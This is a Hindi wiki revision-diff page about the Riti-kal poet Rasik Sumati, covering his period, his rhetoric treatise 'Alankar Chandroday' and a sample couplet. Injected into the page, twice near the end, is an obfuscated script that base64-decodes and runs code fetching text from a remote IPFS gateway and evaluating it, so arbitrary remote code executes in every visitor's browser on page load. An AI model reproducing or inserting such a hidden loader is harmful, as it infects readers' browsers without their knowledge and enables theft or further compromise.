Difference between revisions of "रसिक सुमति"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
* [[रीति काल]] के कवि रसिक सुमति ईश्वरदास के पुत्र थे और [[संवत]] 1785 इनका कविता काल है।  
+
'''रसिक सुमति''' [[रीति काल]] के कवि और ईश्वरदास के पुत्र थे। [[संवत]] 1785 इनका [[कविता]] काल है।
*इन्होंने 'अलंकार चंद्रोदय' नामक एक अलंकार ग्रंथ कुवलया नंद के आधार पर दोहों में बनाया।  
+
*पद्य रचना साधारणत: अच्छी है।  
+
*इन्होंने 'अलंकार चंद्रोदय' नामक एक [[अलंकार]] ग्रंथ कुवलया नंद के आधार पर [[दोहा|दोहों]] में बनाया। पद्य रचना साधारणत: अच्छी है।  
 
*'प्रत्यनीक' का लक्षण और उदाहरण इस प्रकार है-
 
*'प्रत्यनीक' का लक्षण और उदाहरण इस प्रकार है-
 
<blockquote><poem>प्रत्यनीक अरि सों न बस, अरि हितूहि दुख देय।
 
<blockquote><poem>प्रत्यनीक अरि सों न बस, अरि हितूहि दुख देय।
 
रवि सों चलै, न कंज की दीपति ससि हरि लेय</poem></blockquote>
 
रवि सों चलै, न कंज की दीपति ससि हरि लेय</poem></blockquote>
  
{{प्रचार}}
 
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक=|माध्यमिक=|पूर्णता=|शोध=}}
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक=|माध्यमिक=|पूर्णता=|शोध=}}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 12:45, 18 October 2012

rasik sumati riti kal ke kavi aur eeshvaradas ke putr the. sanvat 1785 inaka kavita kal hai.

  • inhoanne 'alankar chandroday' namak ek alankar granth kuvalaya nand ke adhar par dohoan mean banaya. pady rachana sadharanat: achchhi hai.
  • 'pratyanik' ka lakshan aur udaharan is prakar hai-

pratyanik ari soan n bas, ari hitoohi dukh dey.
ravi soan chalai, n kanj ki dipati sasi hari ley


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sambandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>